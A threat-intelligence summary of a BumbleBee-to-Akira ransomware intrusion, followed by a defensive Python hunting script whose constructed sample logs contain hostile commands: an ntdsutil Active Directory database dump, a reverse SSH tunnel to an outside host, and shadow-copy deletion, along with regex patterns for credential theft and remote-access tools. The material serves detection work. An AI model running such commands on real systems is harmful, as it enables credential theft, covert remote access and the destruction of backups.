In July 2025, a sophisticated cyber attack utilized SEO poisoning to deliver the BumbleBee loader through trojanized ManageEngine OpManager installers. Upon execution via DLL side-loading, the malware established communication with its command-and-control (C2) infrastructure and deployed an AdaptixC2 beacon. This allowed the threat actor to perform extensive network reconnaissance, map internal systems, and establish persistence using new domain admin accounts and remote access tools like RustDesk and Cloudflared.
The intrusion progressed into significant credential harvesting, where actors dumped the NTDS.dit Active Directory database and extracted Veeam backup credentials. Lateral movement was facilitated through RDP and reverse SSH tunneling to bypass firewall restrictions. Over 75 GB of sensitive data, including file shares and SYSVOL configurations, was exfiltrated via FileZilla to an external server in Ukraine. The operation culminated in the deployment of Akira ransomware, which utilized WMI to delete Volume Shadow Copies and encrypt both root and child domains.
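As an added illustration (not part of the original report), the following Python sketch runs a handful of hunting rules for the stages named above over constructed process-creation log lines; the `host=|user=|cmd=` line format, the sample commands and the rule set are assumptions chosen for the example.

```python
import re
from collections import namedtuple

Finding = namedtuple("Finding", "host stage technique evidence")

# Each rule: (stage label, MITRE ATT&CK technique id, regex over the command line).
# Name-based matches (rustdesk, cloudflared, filezilla) are weak on their own:
# a renamed binary evades them, so treat hits as hunting leads, not verdicts.
RULES = [
    ("credential dumping", "T1003.003", re.compile(r"ntdsutil|ntds\.dit", re.I)),
    ("remote access tool", "T1219", re.compile(r"rustdesk|cloudflared", re.I)),
    ("reverse ssh tunnel", "T1572", re.compile(r"\bssh\b.*\s-R\s", re.I)),
    ("exfiltration client", "T1048", re.compile(r"filezilla", re.I)),
    ("shadow copy deletion", "T1490",
     re.compile(r"wmic.*shadowcopy.*delete|win32_shadowcopy.*(delete|remove-wmiobject)", re.I)),
]

def parse(line):
    # Assumed format: '|'-separated key=value fields (constructed for this example).
    return dict(part.split("=", 1) for part in line.strip().split("|"))

def scan(lines):
    findings = []
    for line in lines:
        ev = parse(line)
        cmd = ev.get("cmd", "")
        for stage, tid, rx in RULES:
            if rx.search(cmd):
                findings.append(Finding(ev.get("host", "?"), stage, tid, cmd))
    return findings

def stages_by_host(findings):
    # Group hits per host so a chain (e.g. NTDS dump then shadow copy deletion
    # on the same domain controller) stands out from isolated single hits.
    chain = {}
    for f in findings:
        chain.setdefault(f.host, []).append(f.stage)
    return chain

# Constructed sample events mirroring the stages in the intrusion summary.
SAMPLE_LOG = [
    r'host=WS07|user=CORP\jdoe|cmd="C:\Users\jdoe\Downloads\ManageEngine_OpManager_64bit.exe"',  # trojanized installer: no rule fires
    r"host=WS07|user=CORP\jdoe|cmd=C:\Users\jdoe\AppData\Local\Temp\rustdesk.exe",
    r'host=DC01|user=CORP\backupadm|cmd=ntdsutil "ac i ntds" "ifm" "create full C:\Temp\ntds" q q',
    r"host=WS07|user=CORP\jdoe|cmd=ssh -R 3389:127.0.0.1:3389 user@203.0.113.10",
    r'host=FS01|user=CORP\backupadm|cmd="C:\Program Files\FileZilla FTP Client\filezilla.exe"',
    r"host=DC01|user=CORP\backupadm|cmd=wmic shadowcopy delete",
]

if __name__ == "__main__":
    for host, stages in stages_by_host(scan(SAMPLE_LOG)).items():
        print(host, "->", ", ".join(stages))
```

The first sample line shows the limit of this approach: the SEO-poisoned installer looks like a legitimate download by name, so initial access has to be caught elsewhere (download source, DLL side-loading telemetry), while the later stages leave command-line evidence these rules can pick up.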